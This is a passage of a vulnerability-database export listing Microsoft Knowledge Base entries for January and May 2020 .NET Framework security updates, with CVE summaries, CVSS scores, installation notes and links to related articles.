after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4532959](<https://support.microsoft.com/help/4532959>) Description of the Security Only Update for .NET Framework 2.0, 3.0 for Windows Server 2008 SP2 (KB4532959) \n * [4532964](<https://support.microsoft.com/help/4532964>) Description of the Security Only Update for .NET Framework 4.5.2 for Windows Server 2008 SP2 (KB4532964) \n * [4532971](<https://support.microsoft.com/help/4532971>) Description of the Security Only Update for .NET Framework 4.6 for Windows Server 2008 SP2 (KB4532971) \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T08:00:00", "type": "mskb", "title": "Security Only Update for .NET Framework 2.0, 3.0, 4.5.2, 4.6 for Windows Server 2008 SP2 (KB4534979)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0606", "CVE-2020-0646", "CVE-2020-0605"], "modified": "2020-01-14T08:00:00", "id": "KB4534979", "href": "https://support.microsoft.com/en-us/help/4534979", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:39:23", "description": "None\n**Applies to:**Microsoft .NET Framework 3.5.1 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 \n\n## Summary\n\nA remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. \n \nTo learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\n * [CVE-2020-0606](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0606>)\n * [CVE-2020-0646](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0646>)\n** Important **\n\n * Starting in August, 2019, updates to .NET Framework 4.6 and above, for Windows Server 2008 SP2, Windows Server 2008 R2 SP1, and Windows 7SP1, require SHA-2 Code signing support. Please make sure that you have all the latest Windows Updates before applying this update to avoid installation issues. For more detailed information about SHA-2 code signing support updates, please see [KB 4474419](<https://support.microsoft.com/en-us/help/4474419/sha-2-code-signing-support-update>).\n * All updates for .NET Framework 4.7.2, 4.7.1, 4.7, 4.6.2, 4.6.1, and 4.6 require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see [KB 4019990](<https://support.microsoft.com/en-us/help/4019990>).\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4532960](<https://support.microsoft.com/help/4532960>) Description of the Security Only Update for .NET Framework 3.5.1 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4532960)\n * [4532964](<https://support.microsoft.com/help/4532964>) Description of the Security Only Update for .NET Framework 4.5.2 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 (KB4532964)\n * [4532971](<https://support.microsoft.com/help/4532971>) Description of the Security Only Update for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 (KB4532971)\n * [4532952](<https://support.microsoft.com/help/4532952>) Description of the Security Only Update for .NET Framework 4.8 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4532952)\n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T08:00:00", "type": "mskb", "title": "Security Only Update for .NET Framework 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4534976)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0606", "CVE-2020-0646", "CVE-2020-0605"], "modified": "2020-01-14T08:00:00", "id": "KB4534976", "href": "https://support.microsoft.com/en-us/help/4534976", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-12T14:32:13", "description": "None\n**Applies to:**Microsoft .NET Framework 2.0 Microsoft .NET Framework 3.0 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 \n\n## Summary\n\nA remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. \n \nTo learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\n * [CVE-2020-0606](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0606>)\n * [CVE-2020-0646](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0646>)\n** Important **\n\n * Starting in August, 2019, updates to .NET Framework 4.6 and above, for Windows Server 2008 SP2, Windows Server 2008 R2 SP1, and Windows 7SP1, require SHA-2 Code signing support. Please make sure that you have all the latest Windows Updates before applying this update to avoid installation issues. For more detailed information about SHA-2 code signing support updates, please see [KB 4474419](<https://support.microsoft.com/en-us/help/4474419/sha-2-code-signing-support-update>).\n * All updates for .NET Framework 4.6 for Windows Server 2008 Service Pack 2 (SP2) require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see [KB 4019990](<https://support.microsoft.com/en-us/help/4019990>).\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4532944](<https://support.microsoft.com/help/4532944>) Description of the Security and Quality Rollup for .NET Framework 2.0, 3.0 for Windows Server 2008 SP2 (KB4532944) \n * [4532929](<https://support.microsoft.com/help/4532929>) Description of the Security and Quality Rollup for .NET Framework 4.5.2 for Windows Server 2008 SP2 (KB4532929) \n * [4532932](<https://support.microsoft.com/help/4532932>) Description of the Security and Quality Rollup for .NET Framework 4.6 for Windows Server 2008 SP2 (KB4532932) \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-14T08:00:00", "type": "mskb", "title": "Security and Quality Rollup for .NET Framework 2.0, 3.0, 4.5.2, 4.6 for Windows Server 2008 SP2 (KB4535105)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0646"], "modified": "2020-01-14T08:00:00", "id": "KB4535105", "href": "https://support.microsoft.com/en-us/help/4535105", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:42:37", "description": "<html><body><p>January 14, 2020-KB4532934 Cumulative Update for .NET Framework 4.8 for Windows 10 Version 1703</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <div class=\"row\"> <div class=\"col-xs-24\"> <p> Release Date:<br/><strong>January 14, 2020</strong></p> <p> Version:<br/><strong> .NET Framework 4.8</strong></p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. <br/><br/> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul class=\"sbody-free_list\"> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0605</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0606</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0646\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0646</a> </li> </ul><h2>Known issues in this update</h2><p> <span>Microsoft is not currently aware of any issues in this update.</span> </p><h2>How to get this update</h2><p> <strong>Install this update</strong> </p><p> This update will be downloaded and installed automatically from Windows Update.<br/></p><p> To get the standalone package for this update, go to the <span lang=\"EN\"><span><span><a data-content-id=\"\" data-content-type=\"\" href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4532934\" managed-link=\"\" target=\"\">Microsoft Update Catalog</a></span></span></span> website. </p><p> <strong>File information</strong> </p><p> <span>For a list of the files that are provided in this update, download the </span> <a data-content-id=\"\" data-content-type=\"\" href=\"https://download.microsoft.com/download/1/2/8/128d5cd3-e60a-4d2a-a9da-48521ec80dee/4532934.csv\" managed-link=\"\" target=\"_blank\"> file information for cumulative update </a>. </p><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T00:00:00", "type": "mskb", "title": "January 14, 2020-KB4532934 Cumulative Update for .NET Framework 4.8 for Windows 10 Version 1703", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "modified": "2020-01-14T17:56:23", "id": "KB4532934", "href": "https://support.microsoft.com/en-us/help/4532934/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-12T14:32:10", "description": "None\n**Applies to:**Microsoft .NET Framework 3.5.1 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 \n\n## Summary\n\nA remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. \n \nTo learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE).\n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\n * [CVE-2020-0606](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0606>)\n * [CVE-2020-0646](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0646>)\n**Important **\n\n * Starting in August, 2019, updates to .NET Framework 4.6 and above, for Windows Server 2008 SP2, Windows Server 2008 R2 SP1, and Windows 7SP1, require SHA-2 Code signing support. Please make sure that you have all the latest Windows Updates before applying this update to avoid installation issues. For more detailed information about SHA-2 code signing support updates, please see [KB 4474419](<https://support.microsoft.com/help/4474419>).\n * All updates for .NET Framework 4.7.2, 4.7.1, 4.7, 4.6.2, 4.6.1, and 4.6 require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see [KB 4019990](<https://support.microsoft.com/help/4019990>).\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/library/hh825699>).\n\n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4532945](<https://support.microsoft.com/help/4532945>) Description of the Security and Quality Rollup for .NET Framework 3.5.1 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4532945) \n * [4532929](<https://support.microsoft.com/help/4532929>) Description of the Security and Quality Rollup for .NET Framework 4.5.2 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4532929) \n * [4532932](<https://support.microsoft.com/help/4532932>) Description of the Security and Quality Rollup for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4532932) \n * [4532941](<https://support.microsoft.com/help/4532941>) Description of the Security and Quality Rollup for .NET Framework 4.8 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4532941) \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-14T08:00:00", "type": "mskb", "title": "Security and Quality Rollup for .NET Framework 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4535102)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0646"], "modified": "2020-01-14T08:00:00", "id": "KB4535102", "href": "https://support.microsoft.com/en-us/help/4535102", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:39:25", "description": "None\nRelease Date: \n**January 14, 2020** Version: \n** .NET Framework 3.5, 4.7.2 and 4.8**\n\n## Summary\n\nA remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. \n \nTo learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\n * [CVE-2020-0606](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0606>)\n * [CVE-2020-0646](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0646>)\n\n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4532947](<https://support.microsoft.com/help/4532947>) Description of the Cumulative Update for .NET Framework 3.5 and 4.7.2 for Windows 10 Version 1809 and Windows Server 2019 (KB4532947) \n * [4532937](<https://support.microsoft.com/help/4532937>) Description of the Cumulative Update for .NET Framework 3.5 and 4.8 for Windows 10 Version 1809 and Windows Server 2019 (KB4532937) \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T08:00:00", "type": "mskb", "title": "January 14, 2020-KB4535101 Cumulative Update for .NET Framework 3.5, 4.7.2 and 4.8 for Windows 10 Version 1809 and Windows Server 2019", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0606", "CVE-2020-0646", "CVE-2020-0605"], "modified": "2020-01-14T08:00:00", "id": "KB4535101", "href": "https://support.microsoft.com/en-us/help/4535101", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:48:53", "description": "<html><body><p>May 12, 2020-KB4552925 Cumulative Update for .NET Framework 3.5 and 4.8 for Windows 10 Version 2004</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <div class=\"row\"> <div class=\"col-xs-24\"> <p> Release Date:<br/><strong>May 12, 2020</strong></p> <p> Version:<br/><strong> .NET Framework 3.5 and 4.8</strong></p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists in .NET Framework software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. The security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file. </p><p> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0605</a></li></ul><p> A denial of service vulnerability exists when .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application. The update addresses the vulnerability by correcting how the .NET Framework web application handles web requests. </p><p> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1108\" id=\"kb-link-2\" target=\"_self\">CVE-2020-1108</a></li></ul><h2>Known issues in this update</h2><p> <span>Microsoft is not currently aware of any issues in this update.</span> </p><h2>How to get this update</h2><p> <strong>Install this update</strong> </p><p> This update will be downloaded and installed automatically from Windows Update.<br/></p><p> To get the standalone package for this update, go to the <span lang=\"EN\"><span><span><a data-content-id=\"\" data-content-type=\"\" href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4552925\" managed-link=\"\" target=\"\">Microsoft Update Catalog</a></span></span></span> website. </p><p> <strong>File information</strong> </p><p> <span>For a list of the files that are provided in this update, download the </span> <a data-content-id=\"\" data-content-type=\"\" href=\"https://download.microsoft.com/download/d/a/9/da9019da-7092-43c4-ac1a-95ab1a2928a0/4552925.csv\" managed-link=\"\" target=\"_blank\"> file information for cumulative update </a>. </p><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-12T00:00:00", "type": "mskb", "title": "May 12, 2020-KB4552925 Cumulative Update for .NET Framework 3.5 and 4.8 for Windows 10 Version 2004", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1108", "CVE-2020-0605"], "modified": "2020-05-12T17:00:22", "id": "KB4552925", "href": "https://support.microsoft.com/en-us/help/4552925/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-12T14:35:23", "description": "None\nRelease Date: \n**May 12, 2020** Version: \n** .NET Framework 4.8**\n\n## Summary\n\nA remote code execution vulnerability exists in .NET Framework software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. The security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\nA denial of service vulnerability exists when .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application. The update addresses the vulnerability by correcting how the .NET Framework web application handles web requests. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n * [CVE-2020-1108](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1108>)\n\n## Known issues in this update \n\nMicrosoft is not currently aware of any issues in 